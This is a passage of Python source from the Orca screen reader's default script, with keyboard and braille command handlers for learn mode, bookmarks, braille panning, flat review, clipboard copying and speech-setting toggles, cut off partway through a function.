# #
########################################################################
def bypassNextCommand(self, inputEvent=None):
"""Causes the next keyboard command to be ignored by Orca
and passed along to the current application.
Returns True to indicate the input event has been consumed.
"""
self.presentMessage(messages.BYPASS_MODE_ENABLED)
orca_state.bypassNextCommand = True
return True
def enterLearnMode(self, inputEvent=None):
"""Turns learn mode on. The user must press the escape key to exit
learn mode.
Returns True to indicate the input event has been consumed.
"""
if orca_state.learnModeEnabled:
return True
self.presentMessage(messages.VERSION)
self.speakMessage(messages.LEARN_MODE_START_SPEECH)
self.displayBrailleMessage(messages.LEARN_MODE_START_BRAILLE)
orca_state.learnModeEnabled = True
return True
def exitLearnMode(self, inputEvent=None):
"""Turns learn mode off.
Returns True to indicate the input event has been consumed.
"""
if not orca_state.learnModeEnabled:
return False
if isinstance(inputEvent, input_event.KeyboardEvent) \
and not inputEvent.event_string == 'Escape':
return False
self.presentMessage(messages.LEARN_MODE_STOP)
orca_state.learnModeEnabled = False
return True
def listOrcaShortcuts(self, inputEvent=None):
"""Shows a simple gui listing Orca's bound commands."""
if not inputEvent or inputEvent.event_string == "F2":
bound = self.getDefaultKeyBindings().getBoundBindings()
title = messages.shortcutsFoundOrca(len(bound))
else:
try:
appName = self.app.name
except AttributeError:
appName = messages.APPLICATION_NO_NAME
bound = self.getAppKeyBindings().getBoundBindings()
bound.extend(self.getToolkitKeyBindings().getBoundBindings())
title = messages.shortcutsFoundApp(len(bound), appName)
if not bound:
self.presentMessage(title)
return True
self.exitLearnMode()
rows = [(kb.handler.function,
kb.handler.description,
kb.asString()) for kb in bound]
rows = sorted(rows, key=lambda cmd: cmd[2])
header1 = guilabels.KB_HEADER_FUNCTION
header2 = guilabels.KB_HEADER_KEY_BINDING
commandlist.showUI(title, ("", header1, header2), rows, False)
return True
def findNext(self, inputEvent):
"""Searches forward for the next instance of the string
searched for via the Orca Find dialog. Other than direction
and the starting point, the search options initially specified
(case sensitivity, window wrap, and full/partial match) are
preserved.
"""
lastQuery = find.getLastQuery()
if lastQuery:
lastQuery.searchBackwards = False
lastQuery.startAtTop = False
self.find(lastQuery)
else:
orca.showFindGUI()
def findPrevious(self, inputEvent):
"""Searches backwards for the next instance of the string
searched for via the Orca Find dialog. Other than direction
and the starting point, the search options initially specified
(case sensitivity, window wrap, and full/partial match) are
preserved.
"""
lastQuery = find.getLastQuery()
if lastQuery:
lastQuery.searchBackwards = True
lastQuery.startAtTop = False
self.find(lastQuery)
else:
orca.showFindGUI()
def addBookmark(self, inputEvent):
""" Add an in-page accessible object bookmark for this key.
Delegates to Bookmark.addBookmark """
bookmarks = self.getBookmarks()
bookmarks.addBookmark(inputEvent)
def goToBookmark(self, inputEvent):
""" Go to the bookmark indexed by inputEvent.hw_code. Delegates to
Bookmark.goToBookmark """
bookmarks = self.getBookmarks()
bookmarks.goToBookmark(inputEvent)
def goToNextBookmark(self, inputEvent):
""" Go to the next bookmark location. If no bookmark has yet to be
selected, the first bookmark will be used. Delegates to
Bookmark.goToNextBookmark """
bookmarks = self.getBookmarks()
bookmarks.goToNextBookmark(inputEvent)
def goToPrevBookmark(self, inputEvent):
""" Go to the previous bookmark location. If no bookmark has yet to
be selected, the first bookmark will be used. Delegates to
Bookmark.goToPrevBookmark """
bookmarks = self.getBookmarks()
bookmarks.goToPrevBookmark(inputEvent)
def saveBookmarks(self, inputEvent):
""" Save the bookmarks for this script. Delegates to
Bookmark.saveBookmarks """
bookmarks = self.getBookmarks()
bookmarks.saveBookmarks(inputEvent)
def panBrailleLeft(self, inputEvent=None, panAmount=0):
"""Pans the braille display to the left. If panAmount is non-zero,
the display is panned by that many cells. If it is 0, the display
is panned one full display width. In flat review mode, panning
beyond the beginning will take you to the end of the previous line.
In focus tracking mode, the cursor stays at its logical position.
In flat review mode, the review cursor moves to the character
associated with cell 0."""
if self.flatReviewContext:
if self.isBrailleBeginningShowing():
self.flatReviewContext.goBegin(flat_review.Context.LINE)
self.reviewPreviousCharacter(inputEvent)
else:
self.panBrailleInDirection(panAmount, panToLeft=True)
# This will update our target cursor cell
#
self._setFlatReviewContextToBeginningOfBrailleDisplay()
[charString, x, y, width, height] = \
self.flatReviewContext.getCurrent(flat_review.Context.CHAR)
self.targetCursorCell = 1
self.updateBrailleReview(self.targetCursorCell)
elif self.isBrailleBeginningShowing() and orca_state.locusOfFocus \
and self.utilities.isTextArea(orca_state.locusOfFocus):
# If we're at the beginning of a line of a multiline text
# area, then force its caret to the end of the previous
# line. The assumption here is that we're currently
# viewing the line that has the caret -- which is a pretty
# good assumption for focus tracking mode. When we set the
# caret position, we will get a caret event, which will
# then update the braille.
#
text = orca_state.locusOfFocus.queryText()
[lineString, startOffset, endOffset] = text.getTextAtOffset(
text.caretOffset,
pyatspi.TEXT_BOUNDARY_LINE_START)
movedCaret = False
if startOffset > 0:
movedCaret = text.setCaretOffset(startOffset - 1)
# If we didn't move the caret and we're in a terminal, we
# jump into flat review to review the text. See
# http://bugzilla.gnome.org/show_bug.cgi?id=482294.
#
if (not movedCaret) \
and (orca_state.locusOfFocus.getRole() \
== pyatspi.ROLE_TERMINAL):
context = self.getFlatReviewContext()
context.goBegin(flat_review.Context.LINE)
self.reviewPreviousCharacter(inputEvent)
else:
self.panBrailleInDirection(panAmount, panToLeft=True)
# We might be panning through a flashed message.
#
braille.resetFlashTimer()
self.refreshBraille(False, stopFlash=False)
return True
def panBrailleLeftOneChar(self, inputEvent=None):
"""Nudges the braille display one character to the left.
In focus tracking mode, the cursor stays at its logical position.
In flat review mode, the review cursor moves to the character
associated with cell 0."""
self.panBrailleLeft(inputEvent, 1)
def panBrailleRight(self, inputEvent=None, panAmount=0):
"""Pans the braille display to the right. If panAmount is non-zero,
the display is panned by that many cells. If it is 0, the display
is panned one full display width. In flat review mode, panning
beyond the end will take you to the beginning of the next line.
In focus tracking mode, the cursor stays at its logical position.
In flat review mode, the review cursor moves to the character
associated with cell 0."""
if self.flatReviewContext:
if self.isBrailleEndShowing():
self.flatReviewContext.goEnd(flat_review.Context.LINE)
self.reviewNextCharacter(inputEvent)
else:
self.panBrailleInDirection(panAmount, panToLeft=False)
# This will update our target cursor cell
#
self._setFlatReviewContextToBeginningOfBrailleDisplay()
[charString, x, y, width, height] = \
self.flatReviewContext.getCurrent(flat_review.Context.CHAR)
self.targetCursorCell = 1
self.updateBrailleReview(self.targetCursorCell)
elif self.isBrailleEndShowing() and orca_state.locusOfFocus \
and self.utilities.isTextArea(orca_state.locusOfFocus):
# If we're at the end of a line of a multiline text area, then
# force its caret to the beginning of the next line. The
# assumption here is that we're currently viewing the line that
# has the caret -- which is a pretty good assumption for focus
# tracking mode. When we set the caret position, we will get a
# caret event, which will then update the braille.
#
text = orca_state.locusOfFocus.queryText()
[lineString, startOffset, endOffset] = text.getTextAtOffset(
text.caretOffset,
pyatspi.TEXT_BOUNDARY_LINE_START)
if endOffset < text.characterCount:
text.setCaretOffset(endOffset)
else:
self.panBrailleInDirection(panAmount, panToLeft=False)
# We might be panning through a flashed message.
#
braille.resetFlashTimer()
self.refreshBraille(False, stopFlash=False)
return True
def panBrailleRightOneChar(self, inputEvent=None):
"""Nudges the braille display one character to the right.
In focus tracking mode, the cursor stays at its logical position.
In flat review mode, the review cursor moves to the character
associated with cell 0."""
self.panBrailleRight(inputEvent, 1)
def goBrailleHome(self, inputEvent=None):
"""Returns to the component with focus."""
if self.flatReviewContext:
return self.toggleFlatReviewMode(inputEvent)
else:
return braille.returnToRegionWithFocus(inputEvent)
def setContractedBraille(self, inputEvent=None):
"""Toggles contracted braille."""
self._setContractedBraille(inputEvent)
return True
def processRoutingKey(self, inputEvent=None):
"""Processes a cursor routing key."""
braille.processRoutingKey(inputEvent)
return True
def processBrailleCutBegin(self, inputEvent=None):
"""Clears the selection and moves the caret offset in the currently
active text area.
"""
obj, caretOffset = self.getBrailleCaretContext(inputEvent)
if caretOffset >= 0:
self.utilities.clearTextSelection(obj)
self.utilities.setCaretOffset(obj, caretOffset)
return True
def processBrailleCutLine(self, inputEvent=None):
"""Extends the text selection in the currently active text
area and also copies the selected text to the system clipboard."""
obj, caretOffset = self.getBrailleCaretContext(inputEvent)
if caretOffset >= 0:
self.utilities.adjustTextSelection(obj, caretOffset)
texti = obj.queryText()
startOffset, endOffset = texti.getSelection(0)
string = texti.getText(startOffset, endOffset)
clipboard = Gtk.Clipboard.get(Gdk.Atom.intern("CLIPBOARD", False))
clipboard.set_text(string, len(string))
return True
def routePointerToItem(self, inputEvent=None):
"""Moves the mouse pointer to the current item."""
# Store the original location for scripts which want to restore
# it later.
#
self.oldMouseCoordinates = self.utilities.absoluteMouseCoordinates()
self.lastMouseRoutingTime = time.time()
if self.flatReviewContext:
self.flatReviewContext.routeToCurrent()
else:
try:
eventsynthesizer.routeToCharacter(orca_state.locusOfFocus)
except:
try:
eventsynthesizer.routeToObject(orca_state.locusOfFocus)
except:
full = messages.LOCATION_NOT_FOUND_FULL
brief = messages.LOCATION_NOT_FOUND_BRIEF
self.presentMessage(full, brief)
return True
def presentStatusBar(self, inputEvent):
"""Speaks and brailles the contents of the status bar and/or default
button of the window with focus.
"""
obj = orca_state.locusOfFocus
self.updateBraille(obj)
voice = self.voices[settings.DEFAULT_VOICE]
frame, dialog = self.utilities.frameAndDialog(obj)
if frame:
# In windows with lots of objects (Thunderbird, Firefox, etc.),
# if we wait until we've checked for both the status bar and
# a default button, there may be a noticeable delay. Therefore,
# speak the status bar info immediately and then go looking
# for a default button.
#
msg = self.speechGenerator.generateStatusBar(frame)
if msg:
self.presentMessage(msg, voice=voice)
window = dialog or frame
if window:
msg = self.speechGenerator.generateDefaultButton(window)
if msg:
self.presentMessage(msg, voice=voice)
def presentTitle(self, inputEvent):
"""Speaks and brailles the title of the window with focus."""
title = self.speechGenerator.generateTitle(orca_state.locusOfFocus)
for (string, voice) in title:
self.presentMessage(string, voice=voice)
def readCharAttributes(self, inputEvent=None):
"""Reads the attributes associated with the current text character.
Speaks the attributes the user has enabled. By default,
a certain set of attributes will be spoken. If this is not desired,
then individual application scripts should override this method to
only speak the subset required.
"""
attrs, start, end = self.utilities.textAttributes(orca_state.locusOfFocus, None, True)
# Get a dictionary of text attributes that the user cares about.
[userAttrList, userAttrDict] = self.utilities.stringToKeysAndDict(
_settingsManager.getSetting('enabledSpokenTextAttributes'))
# Because some implementors make up their own attribute names,
# we need to convert.
userAttrList = list(map(self.utilities.getAppNameForAttribute, userAttrList))
nullValues = ['0', '0mm', 'none', 'false']
for key in userAttrList:
value = attrs.get(key)
ignoreIfValue = userAttrDict.get(key)
if value in nullValues and ignoreIfValue in nullValues:
continue
if value and value != ignoreIfValue:
self.speakMessage(self.utilities.localizeTextAttribute(key, value))
return True
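# stringToKeysAndDict, used above, lives in the utilities module. A hedged
# sketch of the parsing it is assumed to perform on a spec string such as
# "size:; weight:400;" (ordered keys plus a key -> ignore-value map):
#
#   def string_to_keys_and_dict_sketch(spec):
#       keys, mapping = [], {}
#       for pair in filter(None, spec.split(";")):
#           key, _, value = pair.strip().partition(":")
#           keys.append(key)
#           mapping[key] = value
#       return keys, mapping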
def leftClickReviewItem(self, inputEvent=None):
"""Performs a left mouse button click on the current item."""
if self.flatReviewContext:
self.flatReviewContext.clickCurrent(1)
else:
try:
eventsynthesizer.clickCharacter(orca_state.locusOfFocus, 1)
except:
try:
eventsynthesizer.clickObject(orca_state.locusOfFocus, 1)
except:
self.speakMessage(messages.LOCATION_NOT_FOUND_FULL)
return True
def rightClickReviewItem(self, inputEvent=None):
"""Performs a right mouse button click on the current item."""
if self.flatReviewContext:
self.flatReviewContext.clickCurrent(3)
else:
try:
eventsynthesizer.clickCharacter(orca_state.locusOfFocus, 3)
except:
try:
eventsynthesizer.clickObject(orca_state.locusOfFocus, 3)
except:
full = messages.LOCATION_NOT_FOUND_FULL
brief = messages.LOCATION_NOT_FOUND_BRIEF
self.presentMessage(full, brief)
return True
def spellCurrentItem(self, itemString):
"""Spell the current flat review word or line.
Arguments:
- itemString: the string to spell.
"""
for character in itemString:
self.speakCharacter(character)
def _reviewCurrentItem(self, inputEvent, targetCursorCell=0,
speechType=1):
"""Presents the current item to the user.
Arguments:
- inputEvent - the current input event.
- targetCursorCell - if non-zero, the target braille cursor cell.
- speechType - the desired presentation: speak (1), spell (2), or
phonetic (3).
"""
context = self.getFlatReviewContext()
[wordString, x, y, width, height] = \
context.getCurrent(flat_review.Context.WORD)
# Don't announce anything from speech if the user used
# the Braille display as an input device.
#
if not isinstance(inputEvent, input_event.BrailleEvent):
if (not wordString) \
or (not len(wordString)) \
or (wordString == "\n"):
speech.speak(messages.BLANK)
else:
[lineString, x, y, width, height] = \
context.getCurrent(flat_review.Context.LINE)
if lineString == "\n":
speech.speak(messages.BLANK)
elif wordString.isspace():
speech.speak(messages.WHITE_SPACE)
elif wordString.isupper() and speechType == 1:
speech.speak(wordString,
self.voices[settings.UPPERCASE_VOICE])
elif speechType == 2:
self.spellCurrentItem(wordString)
elif speechType == 3:
self.phoneticSpellCurrentItem(wordString)
elif speechType == 1:
wordString = self.utilities.adjustForRepeats(wordString)
speech.speak(wordString)
self.updateBrailleReview(targetCursorCell)
self.currentReviewContents = wordString
return True
def reviewCurrentAccessible(self, inputEvent):
context = self.getFlatReviewContext()
[zoneString, x, y, width, height] = \
context.getCurrent(flat_review.Context.ZONE)
# Don't announce anything from speech if the user used
# the Braille display as an input device.
#
if not isinstance(inputEvent, input_event.BrailleEvent):
utterances = self.speechGenerator.generateSpeech(
context.getCurrentAccessible())
utterances.extend(self.tutorialGenerator.getTutorial(
context.getCurrentAccessible(), False))
speech.speak(utterances)
return True
def reviewPreviousItem(self, inputEvent):
"""Moves the flat review context to the previous item. Places
the flat review cursor at the beginning of the item."""
context = self.getFlatReviewContext()
moved = context.goPrevious(flat_review.Context.WORD,
flat_review.Context.WRAP_LINE)
if moved:
self._reviewCurrentItem(inputEvent)
self.targetCursorCell = self.getBrailleCursorCell()
return True
def reviewNextItem(self, inputEvent):
"""Moves the flat review context to the next item. Places
the flat review cursor at the beginning of the item."""
context = self.getFlatReviewContext()
moved = context.goNext(flat_review.Context.WORD,
flat_review.Context.WRAP_LINE)
if moved:
self._reviewCurrentItem(inputEvent)
self.targetCursorCell = self.getBrailleCursorCell()
return True
def reviewCurrentCharacter(self, inputEvent):
"""Brailles and speaks the current flat review character."""
self._reviewCurrentCharacter(inputEvent, 1)
return True
def reviewSpellCurrentCharacter(self, inputEvent):
"""Brailles and 'spells' (phonetically) the current flat review
character.
"""
self._reviewCurrentCharacter(inputEvent, 2)
return True
def reviewUnicodeCurrentCharacter(self, inputEvent):
"""Brailles and speaks unicode information about the current flat
review character.
"""
self._reviewCurrentCharacter(inputEvent, 3)
return True
def _reviewCurrentCharacter(self, inputEvent, speechType=1):
"""Presents the current flat review character via braille and speech.
Arguments:
- inputEvent - the current input event.
- speechType - the desired presentation:
speak (1),
phonetic (2)
unicode value information (3)
"""
context = self.getFlatReviewContext()
[charString, x, y, width, height] = \
context.getCurrent(flat_review.Context.CHAR)
# Don't announce anything from speech if the user used
# the Braille display as an input device.
#
if not isinstance(inputEvent, input_event.BrailleEvent):
if (not charString) or (not len(charString)):
speech.speak(messages.BLANK)
else:
[lineString, x, y, width, height] = \
context.getCurrent(flat_review.Context.LINE)
if lineString == "\n" and speechType != 3:
speech.speak(messages.BLANK)
elif speechType == 3:
self.speakUnicodeCharacter(charString)
elif speechType == 2:
self.phoneticSpellCurrentItem(charString)
else:
self.speakCharacter(charString)
self.updateBrailleReview()
self.currentReviewContents = charString
return True
def reviewPreviousCharacter(self, inputEvent):
"""Moves the flat review context to the previous character. Places
the flat review cursor at character."""
context = self.getFlatReviewContext()
moved = context.goPrevious(flat_review.Context.CHAR,
flat_review.Context.WRAP_LINE)
if moved:
self._reviewCurrentCharacter(inputEvent)
self.targetCursorCell = self.getBrailleCursorCell()
return True
def reviewEndOfLine(self, inputEvent):
"""Moves the flat review context to the end of the line. Places
the flat review cursor at the end of the line."""
context = self.getFlatReviewContext()
context.goEnd(flat_review.Context.LINE)
self.reviewCurrentCharacter(inputEvent)
self.targetCursorCell = self.getBrailleCursorCell()
return True
def reviewNextCharacter(self, inputEvent):
"""Moves the flat review context to the next character. Places
the flat review cursor at character."""
context = self.getFlatReviewContext()
moved = context.goNext(flat_review.Context.CHAR,
flat_review.Context.WRAP_LINE)
if moved:
self._reviewCurrentCharacter(inputEvent)
self.targetCursorCell = self.getBrailleCursorCell()
return True
def reviewAbove(self, inputEvent):
"""Moves the flat review context to the character most directly
above the current flat review cursor. Places the flat review
cursor at character."""
context = self.getFlatReviewContext()
moved = context.goAbove(flat_review.Context.CHAR,
flat_review.Context.WRAP_LINE)
if moved:
self._reviewCurrentItem(inputEvent, self.targetCursorCell)
return True
def reviewBelow(self, inputEvent):
"""Moves the flat review context to the character most directly
below the current flat review cursor. Places the flat review
cursor at character."""
context = self.getFlatReviewContext()
moved = context.goBelow(flat_review.Context.CHAR,
flat_review.Context.WRAP_LINE)
if moved:
self._reviewCurrentItem(inputEvent, self.targetCursorCell)
return True
def reviewCurrentLine(self, inputEvent):
"""Brailles and speaks the current flat review line."""
self._reviewCurrentLine(inputEvent, 1)
return True
def reviewSpellCurrentLine(self, inputEvent):
"""Brailles and spells the current flat review line."""
self._reviewCurrentLine(inputEvent, 2)
return True
def reviewPhoneticCurrentLine(self, inputEvent):
"""Brailles and phonetically spells the current flat review line."""
self._reviewCurrentLine(inputEvent, 3)
return True
def _reviewCurrentLine(self, inputEvent, speechType=1):
"""Presents the current flat review line via braille and speech.
Arguments:
- inputEvent - the current input event.
- speechType - the desired presentation: speak (1), spell (2), or
phonetic (3)
"""
context = self.getFlatReviewContext()
[lineString, x, y, width, height] = \
context.getCurrent(flat_review.Context.LINE)
# Don't announce anything from speech if the user used
# the Braille display as an input device.
#
if not isinstance(inputEvent, input_event.BrailleEvent):
if (not lineString) \
or (not len(lineString)) \
or (lineString == "\n"):
speech.speak(messages.BLANK)
elif lineString.isspace():
speech.speak(messages.WHITE_SPACE)
elif lineString.isupper() \
and (speechType < 2 or speechType > 3):
speech.speak(lineString, self.voices[settings.UPPERCASE_VOICE])
elif speechType == 2:
self.spellCurrentItem(lineString)
elif speechType == 3:
self.phoneticSpellCurrentItem(lineString)
else:
lineString = self.utilities.adjustForRepeats(lineString)
speech.speak(lineString)
self.updateBrailleReview()
self.currentReviewContents = lineString
return True
def reviewPreviousLine(self, inputEvent):
"""Moves the flat review context to the beginning of the
previous line."""
context = self.getFlatReviewContext()
moved = context.goPrevious(flat_review.Context.LINE,
flat_review.Context.WRAP_LINE)
if moved:
self._reviewCurrentLine(inputEvent)
self.targetCursorCell = self.getBrailleCursorCell()
return True
def reviewHome(self, inputEvent):
"""Moves the flat review context to the top left of the current
window."""
context = self.getFlatReviewContext()
context.goBegin()
self._reviewCurrentLine(inputEvent)
self.targetCursorCell = self.getBrailleCursorCell()
return True
def reviewNextLine(self, inputEvent):
"""Moves the flat review context to the beginning of the
next line. Places the flat review cursor at the beginning
of the line."""
context = self.getFlatReviewContext()
moved = context.goNext(flat_review.Context.LINE,
flat_review.Context.WRAP_LINE)
if moved:
self._reviewCurrentLine(inputEvent)
self.targetCursorCell = self.getBrailleCursorCell()
return True
def reviewBottomLeft(self, inputEvent):
"""Moves the flat review context to the beginning of the
last line in the window. Places the flat review cursor at
the beginning of the line."""
context = self.getFlatReviewContext()
context.goEnd(flat_review.Context.WINDOW)
context.goBegin(flat_review.Context.LINE)
self._reviewCurrentLine(inputEvent)
self.targetCursorCell = self.getBrailleCursorCell()
return True
def reviewEnd(self, inputEvent):
"""Moves the flat review context to the end of the
last line in the window. Places the flat review cursor
at the end of the line."""
context = self.getFlatReviewContext()
context.goEnd()
self._reviewCurrentLine(inputEvent)
self.targetCursorCell = self.getBrailleCursorCell()
return True
def reviewCurrentItem(self, inputEvent, targetCursorCell=0):
"""Brailles and speaks the current item to the user."""
self._reviewCurrentItem(inputEvent, targetCursorCell, 1)
return True
def reviewSpellCurrentItem(self, inputEvent, targetCursorCell=0):
"""Brailles and spells the current item to the user."""
self._reviewCurrentItem(inputEvent, targetCursorCell, 2)
return True
def reviewPhoneticCurrentItem(self, inputEvent, targetCursorCell=0):
"""Brailles and phonetically spells the current item to the user."""
self._reviewCurrentItem(inputEvent, targetCursorCell, 3)
return True
def flatReviewCopy(self, inputEvent):
"""Copies the contents of the item under flat review to and places
them in the clipboard."""
if self.flatReviewContext:
clipboard = Gtk.Clipboard.get(Gdk.Atom.intern("CLIPBOARD", False))
clipboard.set_text(
self.currentReviewContents, len(self.currentReviewContents))
self.presentMessage(messages.FLAT_REVIEW_COPIED)
else:
self.presentMessage(messages.FLAT_REVIEW_NOT_IN)
return True
def _appendToClipboard(self, clipboard, text, newText):
"""Appends newText to text and places the results in the
clipboard."""
text = text.rstrip("\n")
text = "%s\n%s" % (text, newText)
if clipboard:
clipboard.set_text(text, len(text))
return True
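# Gtk.Clipboard.request_text invokes its callback as
# callback(clipboard, text, user_data); text is None when the clipboard is
# empty, which the guard above handles. A standalone sketch of the flow:
#
#   def on_text(clipboard, text, new_text):
#       combined = (text or "").rstrip("\n") + "\n" + new_text
#       clipboard.set_text(combined, len(combined))
#
#   clipboard.request_text(on_text, "appended line")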
def flatReviewAppend(self, inputEvent):
"""Appends the contents of the item under flat review to
the clipboard."""
if self.flatReviewContext:
clipboard = Gtk.Clipboard.get(Gdk.Atom.intern("CLIPBOARD", False))
clipboard.request_text(
self._appendToClipboard, self.currentReviewContents)
self.presentMessage(messages.FLAT_REVIEW_APPENDED)
else:
self.presentMessage(messages.FLAT_REVIEW_NOT_IN)
return True
def sayAll(self, inputEvent, obj=None, offset=None):
try:
clickCount = inputEvent.getClickCount()
except:
clickCount = 1
doubleClick = clickCount == 2
if doubleClick:
# Try to "say all" for the current dialog/window by flat
# reviewing everything. See bug #354462 for more details.
#
context = self.getFlatReviewContext()
utterances = []
context.goBegin()
while True:
[wordString, x, y, width, height] = \
context.getCurrent(flat_review.Context.ZONE)
utterances.append(wordString)
moved = context.goNext(flat_review.Context.ZONE,
flat_review.Context.WRAP_LINE)
if not moved:
break
speech.speak(utterances)
return
obj = obj or orca_state.locusOfFocus
try:
text = obj.queryText()
except NotImplementedError:
utterances = self.speechGenerator.generateSpeech(obj)
utterances.extend(self.tutorialGenerator.getTutorial(obj, False))
speech.speak(utterances)
except AttributeError:
pass
else:
if offset is None:
offset = text.caretOffset
speech.sayAll(self.textLines(obj, offset),
self.__sayAllProgressCallback)
return True
def toggleFlatReviewMode(self, inputEvent=None):
"""Toggles between flat review mode and focus tracking mode."""
verbosity = _settingsManager.getSetting('speechVerbosityLevel')
if self.flatReviewContext:
if inputEvent and verbosity != settings.VERBOSITY_LEVEL_BRIEF:
self.presentMessage(messages.FLAT_REVIEW_STOP)
self.flatReviewContext = None
self.updateBraille(orca_state.locusOfFocus)
else:
if inputEvent and verbosity != settings.VERBOSITY_LEVEL_BRIEF:
self.presentMessage(messages.FLAT_REVIEW_START)
context = self.getFlatReviewContext()
[wordString, x, y, width, height] = \
context.getCurrent(flat_review.Context.WORD)
self._reviewCurrentItem(inputEvent, self.targetCursorCell)
return True
def toggleSilenceSpeech(self, inputEvent=None):
"""Toggle the silencing of speech.
Returns True to indicate the input event has been consumed.
"""
speech.stop()
if _settingsManager.getSetting('silenceSpeech'):
_settingsManager.setSetting('silenceSpeech', False)
self.presentMessage(messages.SPEECH_ENABLED)
elif not _settingsManager.getSetting('enableSpeech'):
_settingsManager.setSetting('enableSpeech', True)
speech.init()
self.presentMessage(messages.SPEECH_ENABLED)
else:
self.presentMessage(messages.SPEECH_DISABLED)
_settingsManager.setSetting('silenceSpeech', True)
return True
def toggleSpeechVerbosity(self, inputEvent=None):
"""Toggles speech verbosity level between verbose and brief."""
value = _settingsManager.getSetting('speechVerbosityLevel')
if value == settings.VERBOSITY_LEVEL_BRIEF:
self.presentMessage(messages.SPEECH_VERBOSITY_VERBOSE)
_settingsManager.setSetting(
'speechVerbosityLevel', settings.VERBOSITY_LEVEL_VERBOSE)
else:
self.presentMessage(messages.SPEECH_VERBOSITY_BRIEF)
_settingsManager.setSetting(
'speechVerbosityLevel', settings.VERBOSITY_LEVEL_BRIEF)
return True
def toggleSpeakingIndentationJustification(self, inputEvent=None):
"""Toggles the speaking of indentation and justification."""
value = _settingsManager.getSetting('enableSpeechIndentation')
_settingsManager.setSetting('enableSpeechIndentation', not value)
if _settingsManager.getSetting('enableSpeechIndentation'):
full = messages.INDENTATION_JUSTIFICATION_ON_FULL
brief = messages.INDENTATION_JUSTIFICATION_ON_BRIEF
else:
full = messages.INDENTATION_JUSTIFICATION_OFF_FULL
brief = messages.INDENTATION_JUSTIFICATION_OFF_BRIEF
self.presentMessage(full, brief)
return True
def cycleSpeakingPunctuationLevel(self, inputEvent=None):
""" Cycle through the punctuation levels for speech. """
currentLevel = _settingsManager.getSetting('verbalizePunctuationStyle')
if currentLevel == settings.PUNCTUATION_STYLE_NONE:
newLevel = settings.PUNCTUATION_STYLE_SOME
full = messages.PUNCTUATION_SOME_FULL
brief = messages.PUNCTUATION_SOME_BRIEF
elif currentLevel == settings.PUNCTUATION_STYLE_SOME:
newLevel = settings.PUNCTUATION_STYLE_MOST
full = messages.PUNCTUATION_MOST_FULL
brief = messages.PUNCTUATION_MOST_BRIEF
elif currentLevel == settings.PUNCTUATION_STYLE_MOST:
newLevel = settings.PUNCTUATION_STYLE_ALL
full = messages.PUNCTUATION_ALL_FULL
brief = messages.PUNCTUATION_ALL_BRIEF
else:
newLevel = settings.PUNCTUATION_STYLE_NONE
full = messages.PUNCTUATION_NONE_FULL
brief = messages.PUNCTUATION_NONE_BRIEF
_settingsManager.setSetting('verbalizePunctuationStyle', newLevel)
self.presentMessage(full, brief)
speech.updatePunctuationLevel()
return True
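# The if/elif ladder walks a fixed cycle NONE -> SOME -> MOST -> ALL ->
# NONE. An equivalent data-driven sketch, assuming currentLevel is always
# one of the four styles:
#
#   cycle = [settings.PUNCTUATION_STYLE_NONE,
#            settings.PUNCTUATION_STYLE_SOME,
#            settings.PUNCTUATION_STYLE_MOST,
#            settings.PUNCTUATION_STYLE_ALL]
#   newLevel = cycle[(cycle.index(currentLevel) + 1) % len(cycle)]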
def cycleSettingsProfile(self, inputEvent=None):
"""Cycle through the user's existing settings profiles."""
profiles = _settingsManager.availableProfiles()
if not (profiles and profiles[0]):
self.presentMessage(messages.PROFILE_NOT_FOUND)
return True
isMatch = lambda x: x[1] == _settingsManager.getProfile()
current = list(filter(isMatch, profiles))[0]
try:
name, profileID = profiles[profiles.index(current) + 1]
except IndexError:
name, profileID = profiles[0]
_settingsManager.setProfile(profileID, updateLocale=True)
# TODO: The right fix is to go find each and every case where we use
# self.voices directly and instead get the voices from the Settings
# Manager. But that's too big a change too close to code freeze. So
# for now we'll hack.
self.voices = _settingsManager.getSetting('voices')
# TODO: This is another "too close to code freeze" hack to cause the
# command names to be presented in the correct language.
self.setupInputEventHandlers()
self.presentMessage(messages.PROFILE_CHANGED % name, name)
return True
def cycleCapitalizationStyle(self, inputEvent=None):
""" Cycle through the speech-dispatcher capitalization styles. """
currentStyle = _settingsManager.getSetting('capitalizationStyle')
if currentStyle == settings.CAPITALIZATION_STYLE_NONE:
newStyle = settings.CAPITALIZATION_STYLE_SPELL
full = messages.CAPITALIZATION_SPELL_FULL
brief = messages.CAPITALIZATION_SPELL_BRIEF
elif currentStyle == settings.CAPITALIZATION_STYLE_SPELL:
newStyle = settings.CAPITALIZATION_STYLE_ICON
full = messages.CAPITALIZATION_ICON_FULL
brief = messages.CAPITALIZATION_ICON_BRIEF
else:
newStyle = settings.CAPITALIZATION_STYLE_NONE
full = messages.CAPITALIZATION_NONE_FULL
brief = messages.CAPITALIZATION_NONE_BRIEF
_settingsManager.setSetting('capitalizationStyle', newStyle)
self.presentMessage(full, brief)
speech.updateCapitalizationStyle()
return True
def cycleKeyEcho(self, inputEvent=None):
(newKey, newWord, newSentence) = (False, False, False)
key = _settingsManager.getSetting('enableKeyEcho')
word = _settingsManager.getSetting('enableEchoByWord')
sentence = _settingsManager.getSetting('enableEchoBySentence')
if (key, word, sentence) == (False, False, False):
(newKey, newWord, newSentence) = (True, False, False)
full = messages.KEY_ECHO_KEY_FULL
brief = messages.KEY_ECHO_KEY_BRIEF
elif (key, word, sentence) == (True, False, False):
(newKey, newWord, newSentence) = (False, True, False)
full = messages.KEY_ECHO_WORD_FULL
brief = messages.KEY_ECHO_WORD_BRIEF
elif (key, word, sentence) == (False, True, False):
(newKey, newWord, newSentence) = (False, False, True)
full = messages.KEY_ECHO_SENTENCE_FULL
brief = messages.KEY_ECHO_SENTENCE_BRIEF
elif (key, word, sentence) == (False, False, True):
(newKey, newWord, newSentence) = (True, True, False)
full = messages.KEY_ECHO_KEY_AND_WORD_FULL
brief = messages.KEY_ECHO_KEY_AND_WORD_BRIEF
elif (key, word, sentence) == (True, True, False):
(newKey, newWord, newSentence) = (False, True, True)
full = messages.KEY_ECHO_WORD_AND_SENTENCE_FULL
brief = messages.KEY_ECHO_WORD_AND_SENTENCE_BRIEF
else:
(newKey, newWord, newSentence) = (False, False, False)
full = messages.KEY_ECHO_NONE_FULL
brief = messages.KEY_ECHO_NONE_BRIEF
_settingsManager.setSetting('enableKeyEcho', newKey)
_settingsManager.setSetting('enableEchoByWord', newWord)
_settingsManager.setSetting('enableEchoBySentence', newSentence)
self.presentMessage(full, brief)
return True
def toggleTableCellReadMode(self, inputEvent=None):
"""Toggles an indicator for whether we should just read the current
table cell or read the whole row."""
speakRow = _settingsManager.getSetting('readTableCellRow')
_settingsManager.setSetting('readTableCellRow', not speakRow)
if not speakRow:
